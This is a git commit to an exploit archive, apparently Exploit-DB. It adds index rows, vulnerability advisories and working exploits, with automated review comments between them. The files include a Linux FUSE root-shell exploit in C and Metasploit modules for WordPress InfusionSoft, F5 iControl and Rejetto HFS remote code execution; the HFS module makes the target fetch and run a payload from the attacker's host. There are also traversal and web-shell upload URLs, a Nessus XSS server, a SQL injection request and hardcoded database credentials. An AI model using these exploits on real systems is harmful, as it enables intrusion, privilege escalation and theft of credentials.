Updated 10_11_2014

Offensive Security 2014-10-11 04:45:11 +00:00
parent b8f45520a1
commit 5d692d183c
9 changed files with 777 additions and 1 deletions


@ -31444,3 +31444,10 @@ id,file,description,date,author,platform,type,port
34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0
34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
34923,platforms/linux/local/34923.c,"Linux Kernel remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0
34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0
34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80
34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer Remote Command Execution",2014-10-09,metasploit,windows,remote,80
34927,platforms/unix/remote/34927.rb,"F5 iControl Remote Root Command Execution",2014-10-09,metasploit,unix,remote,443
34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0
34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0
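Review bot: the 34923 row describes the entry only as "Linux Kernel remount FUSE Exploit" while the file it indexes names CVE-2014-5207 in its header comment; the other rows carry a product version or identifier, so put the CVE in the description so the entry can be found by id. Ids 34920 and 34922 are skipped in this hunk with no corresponding rows; confirm that gap is intentional.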

platforms/jsp/webapps/34928.txt Executable file

@ -0,0 +1,82 @@
DrayTek VigorACS SI ( <= 1.3.0)
Vigor ACS-SI Edition is a Central Management System for DrayTek
routers and firewalls,
providing System Integrators or system administration personnel a
real-time integrated
monitoring, configuration and management platform.
-----------------------------------------------------------------------
2.1. Default http-auth username/password used for <ip>/ACSServer/*
We found that most of the VigorACS SI deployments are using the
default http authentication settings (acs/password). This is not so much
a software vulnerability but more a configuration issue.
2.2 Unauthenticated arbitrary file read/write functionality via
UploadDownloadServlet
The UploadDownloadServlet can be used to (read and) write files to the
server directly. In addition, this functionality is accessible without
having to provide the
http authentication details (2.1).
2.3. Path traversal and Local File Inclusion in the FileServlet
The regular expression that is used to prevent this is not sufficient:
it removes occurences of '../' (without the quotes). By providing input
like '....//', the middle '../' will be removed, while the remainder
equals to '../'. We could now use the FileServlet to access any file on
the server:
<ip>/ACSServer/FileServlet?f=....//....//....//....//....//....//....//etc/passwd
2.4. Arbitrary file upload in <ip>/ACSServer/UploadFileServlet
This servlet suffers from the same path traversal vulnerability as
described in 2.2. You can POST data to this servlet to upload files
into arbitrary
locations:
http://<ip>//ACSServer/UploadFileServlet?prefix=<URLENCODED('a&....//....//....//....//....//server/default/deploy/web.war/shell.jsp&a&a&a&a')>
The UploadFileServlet will append '.cfg' to the given filename, this means files
uploaded via this mechanism aren't directly of use by an attacker. However, when
the payload is a ZIP archive, the vuln. in 2.5 (Local unzip functionality)
can be used to unpack an otherwise benign file into an full-blown
remote web-shell.
2.5. Local unzip functionality
The RPC server provides an unzip functionality (rpcmanager.UnZip) that can be
invoked by using the AMF message broker (accessible via
http://<ip>/ACSServer/messagebroker/amf). This functionality can be used
to unzip any file on the file system like one that has been previously uploaded
using the UploadFileServlet vuln.
2.6. ACS runs as root
The webservice is running as the root user.
-----------------------------------------------------------------------
Timetable:
2014-09-26 : Vender released patches (private and unverified) to their customers
2014-07-22 : Vendor states that most of the vulns. are patched
2014-07-08 : Vendor notified customers with large deployments
2014-06-30 : Response of Vendor
2014-06-24 : Notified Vendor
Researchers:
Victor van der Veen (vvdveen@cs.vu.nl)
Erik-Paul Dittmer (epdittmer@digitalmisfits.com)
- - - - - - - - - - - - - - - - - - - - - - - - - -
Digital Misfits does not accept any liability for any errors,
omissions, delays of receipt or viruses in the contents of this
message which arise as a result of e-mail transmission.
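Review bot: section 2.4 says the UploadFileServlet "suffers from the same path traversal vulnerability as described in 2.2", but the '....//' regex-stripping traversal is described in 2.3 (2.2 covers the UploadDownloadServlet); fix the cross-reference. The advisory also jumps straight to 2.1 with no section 1 (affected versions beyond "<= 1.3.0", tested build, fix status), and the Timetable ends with "patches (private and unverified)" yet no workaround is given; add a short mitigation section (change the default acs/password credentials from 2.1, restrict network access to the /ACSServer/ servlets, stop running the service as root per 2.6). Spelling: "occurences" -> "occurrences", "Vender" -> "Vendor", "an full-blown" -> "a full-blown". The e-mail liability disclaimer at the end is mail-client boilerplate and should not be part of the archived advisory.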

platforms/linux/local/34923.c Executable file

@ -0,0 +1,194 @@
/*
FUSE-based exploit for CVE-2014-5207
Copyright (c) 2014 Andy Lutomirski
Based on code that is:
Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>
This program can be distributed under the terms of the GNU GPL.
See the file COPYING.
gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid
mkdir test
./fuse_suid test
This isn't a work of art: it doesn't clean up after itself very well.
*/
#define _GNU_SOURCE
#define FUSE_USE_VERSION 26
#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <err.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <unistd.h>
static const char *sh_path = "/sh";
static int sh_fd;
static loff_t sh_size;
static int hello_getattr(const char *path, struct stat *stbuf)
{
int res = 0;
memset(stbuf, 0, sizeof(struct stat));
if (strcmp(path, "/") == 0) {
stbuf->st_mode = S_IFDIR | 0755;
stbuf->st_nlink = 2;
} else if (strcmp(path, sh_path) == 0) {
stbuf->st_mode = S_IFREG | 04755;
stbuf->st_nlink = 1;
stbuf->st_size = sh_size;
} else
res = -ENOENT;
return res;
}
static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi)
{
(void) offset;
(void) fi;
if (strcmp(path, "/") != 0)
return -ENOENT;
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, sh_path + 1, NULL, 0);
return 0;
}
static int hello_open(const char *path, struct fuse_file_info *fi)
{
if (strcmp(path, sh_path) != 0)
return -ENOENT;
if ((fi->flags & 3) != O_RDONLY)
return -EACCES;
return 0;
}
static int hello_read(const char *path, char *buf, size_t size, off_t offset,
struct fuse_file_info *fi)
{
(void) fi;
if (strcmp(path, sh_path) != 0)
return -ENOENT;
return pread(sh_fd, buf, size, offset);
}
static struct fuse_operations hello_oper = {
.getattr = hello_getattr,
.readdir = hello_readdir,
.open = hello_open,
.read = hello_read,
};
static int evilfd = -1;
static int child2(void *mnt_void)
{
const char *mountpoint = mnt_void;
int fd2;
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
err(1, "unshare");
if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)
err(1, "mount");
fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);
if (fd2 == -1)
err(1, "open");
if (dup3(fd2, evilfd, O_CLOEXEC) == -1)
err(1, "dup3");
close(fd2);
printf("Mount hackery seems to have worked.\n");
exit(0);
}
static int child1(const char *mountpoint)
{
char child2stack[2048];
char evil_path[1024];
evilfd = dup(0);
if (evilfd == -1)
err(1, "dup");
if (clone(child2, child2stack,
CLONE_FILES | CLONE_VFORK,
(void *)mountpoint) == -1)
err(1, "clone");
printf("Here goes...\n");
sprintf(evil_path, "/proc/self/fd/%d/sh", evilfd);
execl(evil_path, "sh", "-p", NULL);
perror(evil_path);
return 1;
}
static int fuse_main_suid(int argc, char *argv[],
const struct fuse_operations *op,
void *user_data)
{
struct fuse *fuse;
char *mountpoint;
int multithreaded;
int res;
if (argc != 2) {
printf("Usage: fuse_suid <mountpoint>\n");
return -EINVAL;
}
char *args[] = {"fuse_suid", "-f", "--", argv[1], NULL};
fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,
op, sizeof(*op), &mountpoint,
&multithreaded, user_data);
if (fuse == NULL)
return 1;
printf("FUSE initialized. Time to have some fun...\n");
printf("Warning: this exploit hangs on exit. Hit Ctrl-C when done.\n");
if (fork() == 0)
_exit(child1(mountpoint));
if (multithreaded)
res = fuse_loop_mt(fuse);
else
res = fuse_loop(fuse);
fuse_teardown(fuse, mountpoint);
if (res == -1)
return 1;
return 0;
}
int main(int argc, char *argv[])
{
sh_fd = open("/bin/bash", O_RDONLY);
if (sh_fd == -1)
err(1, "sh");
sh_size = lseek(sh_fd, 0, SEEK_END);
return fuse_main_suid(argc, argv, &hello_oper, NULL);
}
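Review bot: in child1, clone() is passed child2stack itself, i.e. the lowest address of the 2048-byte buffer, but clone() expects the initial stack pointer, and on x86/x86-64 the stack grows downward, so child2's frames land below the array and corrupt child1's stack; pass `child2stack + sizeof(child2stack)` (and 2048 bytes is tight once printf and err are called from the child). Two smaller points: `execl(evil_path, "sh", "-p", NULL)` should end the variadic list with `(char *)NULL` for portability, and the header comment builds the file as fuse_suid.c while the archive stores it as 34923.c, so the quoted gcc line will not match the checked-in name.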


@ -0,0 +1,69 @@
Nessus Web UI 2.3.3: Stored XSS
=========================================================
CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08
-- Info --
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.
-- Affected version -
Web UI version 2.3.3, Build #83
-- Vulnerability details --
By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.
-- POC --
#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log
class Site(server.Site):
def getResourceFor(self, request):
request.setHeader('server', '<script>alert(1)</script>SomeServer')
return server.Site.getResourceFor(self, request)
class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0
def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"
log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()
-- Solution --
This issue has been fixed as of version 2.3.4 of the WEB UI.
-- Timeline --
2014-06-12 Release of Web UI version 2.3.3, build#83
2014-06-13 Vulnerability discovered and creation of POC
2014-06-13 Vulnerability responsibly reported to vendor
2014-06-13 Vulnerability acknowledged by vendor
2014-06-13 Release of Web UI version 2.3.4, build#85
2014-XX-XX Advisory published in coordination with vendor
-- Credit --
Frank Lycops
Frank.lycops [at] thesecurityfactory.be
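Review bot: the vulnerability details say the malicious web server returns a "specially crafted host header", but the PoC sets the HTTP Server response header (`request.setHeader('server', ...)`) and the following sentence refers to the server header; change "host header" to "Server header" so the text matches the PoC. The timeline's last entry is still the "2014-XX-XX" placeholder and should carry the real publication date before the advisory is archived; "-- Affected version -" is also missing its closing dashes. The PoC is Python 2/Twisted (a str body returned from render_GET), which is worth stating next to the shebang.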

platforms/php/remote/34925.rb Executable file

@ -0,0 +1,82 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress InfusionSoft Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
upload and remote code execution.
},
'Author' =>
[
'g0blin', # Vulnerability Discovery
'us3r777 <us3r777@n0b0.so>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-6446'],
['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
['WPVDB', '7634']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
'DisclosureDate' => 'Sep 25 2014',
'DefaultTarget' => 0)
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
)
if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', 'code_generator.php'),
'method' => 'POST',
'vars_post' =>
{
'fileNamePattern' => php_pagename,
'fileTemplate' => payload.encoded
}
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
else
fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
end
print_status("#{peer} - Calling payload ...")
send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', php_pagename)
}, 2)
end
end
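Review bot: the else branch in exploit dereferences `res.code` after the preceding `if` has already allowed `res` to be nil, so a dropped connection raises NoMethodError instead of the intended fail_with message; guard it with `res ? res.code : 'no response'`. `fail_with` in this framework takes a `Failure::` reason constant as its first argument (e.g. `Failure::UnexpectedReply`), not only a message. `register_files_for_cleanup(php_pagename)` registers the bare filename, while the file is served from the plugin's utilities directory, so cleanup will only succeed if the session's working directory happens to be that directory; register the full path. Minor: the module header URL reads "http//metasploit.com" (missing colon).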


@ -41,3 +41,14 @@ file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip
?> ?>
To get users ip, user agent, ... To get users ip, user agent, ...
DESCRIPTION
===========
Add a product to a customer basket with an image tag and without any verification.
HOW TO
======
Just add [img="/action/order/AddToCart?shopId=13159&productId=13312"][/img] on forum signature or forum posts.
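Review bot: the HOW TO in this hunk describes a CSRF: a GET to /action/order/AddToCart with shopId and productId changes state (adds a product to the viewer's basket) with no token or confirmation, which is why an [img] tag in a forum signature or post is enough; the DESCRIPTION should name it as CSRF and state the fix (perform add-to-cart over POST and bind it to a per-session anti-CSRF token). The unchanged context line also shows visitor IP and proxy data being appended to the relative path log.txt via file_put_contents, which resolves next to the script and is therefore fetchable over HTTP unless access to it is blocked.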

platforms/unix/remote/34927.rb Executable file

@ -0,0 +1,143 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "F5 iControl Remote Root Command Execution",
'Description' => %q{
This module exploits an authenticated remote command execution
vulnerability in the F5 BIGIP iControl API (and likely other
F5 devices).
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' # Discovery, Metasploit module
],
'References' =>
[
['CVE', '2014-2928'],
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 iControl', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 17 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
], self.class)
end
def check
get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
hostname = $1
send_cmd("whoami")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
new_hostname = $1
if new_hostname == "root.a.b"
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>#{hostname}</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def send_cmd(cmd)
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>`#{cmd}`.a.b</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
end
def exploit
filename = Rex::Text.rand_text_alpha_lower(5)
print_status('Sending payload in chunks, might take a small bit...')
i = 0
while i < payload.encoded.length
cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#(unknown)"
send_cmd(cmd)
i = i + 5
end
print_status('Triggering payload...')
send_cmd("sh /tmp/#(unknown)")
end
end
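Review bot: check() is destructive: send_cmd("whoami") calls set_hostname, so the device hostname is replaced with the command output, and it is only restored when the result equals "root.a.b"; if the command runs as another user, or the backticks are not interpreted, the hostname stays altered and Safe is returned. Restore the saved hostname unconditionally after the probe, and guard both `res.body =~` matches against a nil response. In exploit, `filename` is generated but never used: as rendered, both command strings reference `/tmp/#(unknown)` rather than `/tmp/#{filename}`, so every run would write to and execute the same fixed path; confirm the interpolation survived. Minor: the module header URL reads "http//metasploit.com".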

platforms/windows/remote/34926.rb Executable file

@ -0,0 +1,121 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Rejetto HttpFileServer Remote Command Execution",
'Description' => %q{
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a
poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by
using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
],
'References' =>
[
['CVE', '2014-6287'],
['OSVDB', '111386'],
['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']
],
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => "Sep 11 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),
], self.class)
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => '/'
})
if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/
version = $1
if Gem::Version.new(version) <= Gem::Version.new("2.3")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end
def on_request_uri(cli, req)
print_status("#{peer} - Payload request received: #{req.uri}")
exe = generate_payload_exe
vbs = Msf::Util::EXE.to_exe_vbs(exe)
send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
# remove resource after serving 1st request as 'exec' execute 4x
# during exploitation
remove_resource(get_resource)
end
def primer
file_name = rand_text_alpha(rand(10)+5)
file_ext = '.vbs'
file_full_name = file_name + file_ext
vbs_path = "%TEMP%\\#{file_full_name}"
vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
vbs_code << "On Error Resume Next\x0d\x0a"
vbs_code << "x.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0a"
vbs_code << "If Err.Number <> 0 Then\x0d\x0a"
vbs_code << "wsh.exit\x0d\x0a"
vbs_code << "End If\x0d\x0a"
vbs_code << "x.Send\x0d\x0a"
vbs_code << "Execute x.responseText"
payloads = [
"save|#{vbs_path}|#{vbs_code}",
"exec|wscript.exe //B //NOLOGO #{vbs_path}"
]
print_status("Sending a malicious request to #{target_uri.path}")
payloads.each do |payload|
send_request_raw({
'method' => 'GET',
'uri' => "/?search=%00{.#{URI::encode(payload)}.}"
})
end
register_file_for_cleanup(vbs_path)
end
def exploit
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
# When the server stops due to our timeout, this is raised
end
end
end
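Review bot: primer builds the callback URL from datastore['LHOST'] while the VBS is served by the HttpServer mixin bound to SRVHOST/SRVPORT; when those differ (LHOST is the payload handler address) the XMLHTTP GET fails and the script silently exits under On Error Resume Next. Use SRVHOST (or the mixin's get_uri helper) for the URL. check() also truncates the version: the regex /HFS ([\d.]+)/ captures "2.3" from "2.3b", so every 2.3x build compares as <= 2.3 and is reported Detected, including builds that may be fixed; compare the full banner. `register_file_for_cleanup(vbs_path)` passes the unexpanded "%TEMP%\\..." string, which only works if the session shell expands the variable. Typos: "orginal" -> "original", "This module exploit" -> "This module exploits".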


@ -0,0 +1,67 @@
>> Multiple critical vulnerabilities in BMC Track-It!
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
The application exposes several .NET remoting services on port 9010.
.NET remoting is a RMI technology similar to Java RMI or CORBA which allows you to invoke methods remotely and retrieve their result. In BMC Track-It!, the .NET remoting services are unauthenticated and unencrypted, meaning that anyone can invoke all the exposed methods remotely.
It is possible to capture traffic and decode the packet format by looking at the (incomplete) Microsoft .NET remoting specifications. Using these techniques, two Metasploit modules were produced: one is an exploit module that can upload arbitrary files to the web root and achieve remote code execution, and the other is an auxiliary module that allows retrieval of the SQL and domain administrator credentials.
Three other vulnerabilities (SQL injection, arbitrary file download and hardcoded database credentials) were also discovered.
A special thanks to CERT for handling the communication to BMC and the disclosure of these vulnerabilities. These issues are tracked by CERT as VU#121036 (http://www.kb.cert.org/vuls/id/121036).
>> Background on the affected product:
"Track-It! IT Help Desk Software includes everything you need for IT Help Desk management. Full featured, easy to deploy, easy to use and cost-effective, Track-It! Help Desk is designed specifically with the needs of small to mid-sized organizations in mind.
Over 55,000 organizations worldwide have trusted Track-It! for their IT help desk ticketing and asset management needs. Track-It! IT Help Desk Software includes, helpdesk, work order ticket tracking, incident and problem management, knowledge management, service level management, asset management, change management, software license management, mobile device access, end-user self-service and more. Track-It! Help Desk delivers the strength of ITSM best practices with the simplicity of smooth installation and quick configuration to provide instant return on your investment."
>> Technical details:
#1 Domain administrator and SQL server user credentials disclosure (unauthenticated)
Versions affected: 9 to 11.3+ (version 8 might be affected, but could not be confirmed)
CVE-2014-4872
The application exposes an unauthenticated .NET remoting configuration service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a configuration file that contains the application database name, username and password as well as the domain administrator username and password. These are encrypted with a fixed key and IV ("NumaraIT") using the DES algorithm. The domain administrator username and password can only be obtained if the Self-Service component is enabled, which is the most common scenario in enterprise deployments.
A Metasploit module that exploits this vulnerability has been released.
#2 Remote code execution via file upload (unauthenticated)
Versions affected: 8 to 11.3+
CVE-2014-4872 (same as #1)
The application exposes an unauthenticated .NET remoting file storage service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an arbitrary path on the machine that is running Track-It!. This can be used to upload a file to the web root and achieve code execution as NETWORK SERVICE or SYSTEM.
A Metasploit module that exploits this vulnerability has been released.
#3 Blind SQL injection (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4873
POST /TrackItWeb/Grid/GetData
pagingMode=0&id=WebGrid.21&appFilters=[{"type":"numeric","field":"userid = 51)) blag; $CREATE TABLE lol(lulz text);$ select woid from (select woid, row_number() over (ORDER BY woid) RowNumber from z$vTASKS_BROWSE -- ","comparison":"=","value":51}]
Accepts injection between the two $.
#4 Arbitrary file download (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4874
GET /TrackItWeb/Attachment/Open?attachmentType=1&entityId=1337&entityGuid=aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa&fileName=C:\boot.ini
#5 Hardcoded database credentials
Versions affected: Unknown, at least from 8 to 11.3+
When installed with the built-in SQL Express, Track-It! uses the following hardcoded database credentials:
Username: TrackIt80_1
Password: TI_DB_P@ssw0rd
>> Fix:
UNFIXED - the vendor refused to acknowledge the vulnerabilities and did not respond to CERT.
Block all communications from untrusted networks (e.g. the Internet) to ports 9010 to 9020; also block the SQL Express database port (default is 49159) if you are using the built-in database.
Ensure you do not have any untrusted users with access to Track-It!.
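Review bot: item #5 (hardcoded database credentials) carries no CVE while #1 to #4 do, and the Fix section's mitigation for it is only implicit in "block the SQL Express database port"; state whether an id was requested and add the operator step (change the TrackIt80_1 password where the installation allows it, and keep the database listener bound to localhost). #1 and #2 share CVE-2014-4872 although they are different services (ConfigurationService vs FileStorageService); say explicitly that one id covers both so readers do not treat it as a typo. The SQL injection in #3 gives a raw request with $ markers but no parameter description; state that the injection point is the "field" value inside appFilters and that it requires an authenticated session, which is what the Fix section's "untrusted users" line relies on.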